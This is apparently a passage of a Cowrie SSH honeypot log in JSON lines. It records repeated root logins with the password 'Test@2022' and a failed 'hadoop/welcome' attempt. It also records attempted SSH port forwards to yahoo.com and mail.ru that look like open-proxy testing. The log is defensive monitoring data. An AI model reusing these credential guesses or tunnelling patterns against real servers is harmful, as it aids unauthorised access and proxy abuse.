{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:10.075344Z","src_ip":"77.83.207.83","session":"e3d1c4a811e4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":24088,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:24088","sensor":"my-vps","timestamp":"2025-08-31T03:46:10.216710Z","session":"e3d1c4a811e4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:10.267651Z","src_ip":"77.83.207.83","session":"e3d1c4a811e4"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:10.318822Z","src_ip":"77.83.207.83","session":"e3d1c4a811e4"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":53708,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f7a047c5a2e","protocol":"ssh","message":"New connection: 77.83.207.83:53708 (1.2.3.4:22) [session: 2f7a047c5a2e]","sensor":"my-vps","timestamp":"2025-08-31T03:46:10.369075Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:10.370380Z","src_ip":"77.83.207.83","session":"2f7a047c5a2e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:10.421498Z","src_ip":"77.83.207.83","session":"2f7a047c5a2e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:10.676334Z","src_ip":"77.83.207.83","session":"2f7a047c5a2e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":8458,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:8458","sensor":"my-vps","timestamp":"2025-08-31T03:46:10.728335Z","session":"2f7a047c5a2e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:10.780338Z","src_ip":"77.83.207.83","session":"2f7a047c5a2e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":7632,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:7632","sensor":"my-vps","timestamp":"2025-08-31T03:46:10.925429Z","session":"2f7a047c5a2e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:10.976546Z","src_ip":"77.83.207.83","session":"2f7a047c5a2e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":2515,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:2515","sensor":"my-vps","timestamp":"2025-08-31T03:46:11.121552Z","session":"2f7a047c5a2e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:11.173024Z","src_ip":"77.83.207.83","session":"2f7a047c5a2e"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:11.225367Z","src_ip":"77.83.207.83","session":"2f7a047c5a2e"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":53802,"dst_ip":"1.2.3.4","dst_port":22,"session":"630bb8358f42","protocol":"ssh","message":"New connection: 77.83.207.83:53802 (1.2.3.4:22) [session: 630bb8358f42]","sensor":"my-vps","timestamp":"2025-08-31T03:46:11.274340Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:11.275554Z","src_ip":"77.83.207.83","session":"630bb8358f42"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:11.325852Z","src_ip":"77.83.207.83","session":"630bb8358f42"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:11.575377Z","src_ip":"77.83.207.83","session":"630bb8358f42"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":8191,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:8191","sensor":"my-vps","timestamp":"2025-08-31T03:46:11.625987Z","session":"630bb8358f42"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:11.675989Z","src_ip":"77.83.207.83","session":"630bb8358f42"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":15963,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:15963","sensor":"my-vps","timestamp":"2025-08-31T03:46:11.816501Z","session":"630bb8358f42"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:11.866818Z","src_ip":"77.83.207.83","session":"630bb8358f42"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":32179,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:32179","sensor":"my-vps","timestamp":"2025-08-31T03:46:12.008387Z","session":"630bb8358f42"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:12.058689Z","src_ip":"77.83.207.83","session":"630bb8358f42"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:12.110064Z","src_ip":"77.83.207.83","session":"630bb8358f42"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"welcome","message":"login attempt [hadoop/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T03:46:12.158201Z","src_ip":"212.227.125.160","session":"21b474f45a05"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":53895,"dst_ip":"1.2.3.4","dst_port":22,"session":"efa7314af0a2","protocol":"ssh","message":"New connection: 77.83.207.83:53895 (1.2.3.4:22) [session: efa7314af0a2]","sensor":"my-vps","timestamp":"2025-08-31T03:46:12.161363Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:12.171995Z","src_ip":"77.83.207.83","session":"efa7314af0a2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:12.214185Z","src_ip":"77.83.207.83","session":"efa7314af0a2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:12.478227Z","src_ip":"77.83.207.83","session":"efa7314af0a2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":31549,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:31549","sensor":"my-vps","timestamp":"2025-08-31T03:46:12.532210Z","session":"efa7314af0a2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:12.585168Z","src_ip":"77.83.207.83","session":"efa7314af0a2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":3223,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:3223","sensor":"my-vps","timestamp":"2025-08-31T03:46:12.731517Z","session":"efa7314af0a2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:12.784743Z","src_ip":"77.83.207.83","session":"efa7314af0a2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":6295,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:6295","sensor":"my-vps","timestamp":"2025-08-31T03:46:12.931245Z","session":"efa7314af0a2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:12.983929Z","src_ip":"77.83.207.83","session":"efa7314af0a2"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:13.037560Z","src_ip":"77.83.207.83","session":"efa7314af0a2"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":54010,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2fd02f43ee9","protocol":"ssh","message":"New connection: 77.83.207.83:54010 (1.2.3.4:22) [session: f2fd02f43ee9]","sensor":"my-vps","timestamp":"2025-08-31T03:46:13.089567Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:13.090580Z","src_ip":"77.83.207.83","session":"f2fd02f43ee9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:13.143290Z","src_ip":"77.83.207.83","session":"f2fd02f43ee9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:13.404674Z","src_ip":"77.83.207.83","session":"f2fd02f43ee9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":25541,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:25541","sensor":"my-vps","timestamp":"2025-08-31T03:46:13.458066Z","session":"f2fd02f43ee9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:13.510879Z","src_ip":"77.83.207.83","session":"f2fd02f43ee9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":21878,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:21878","sensor":"my-vps","timestamp":"2025-08-31T03:46:13.658779Z","session":"f2fd02f43ee9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:13.711388Z","src_ip":"77.83.207.83","session":"f2fd02f43ee9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":8924,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:8924","sensor":"my-vps","timestamp":"2025-08-31T03:46:13.859071Z","session":"f2fd02f43ee9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:13.911766Z","src_ip":"77.83.207.83","session":"f2fd02f43ee9"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:13.964904Z","src_ip":"77.83.207.83","session":"f2fd02f43ee9"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:13.989332Z","src_ip":"212.227.125.160","session":"21b474f45a05"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":54113,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f628f3c22e5","protocol":"ssh","message":"New connection: 77.83.207.83:54113 (1.2.3.4:22) [session: 6f628f3c22e5]","sensor":"my-vps","timestamp":"2025-08-31T03:46:14.013834Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:14.015123Z","src_ip":"77.83.207.83","session":"6f628f3c22e5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96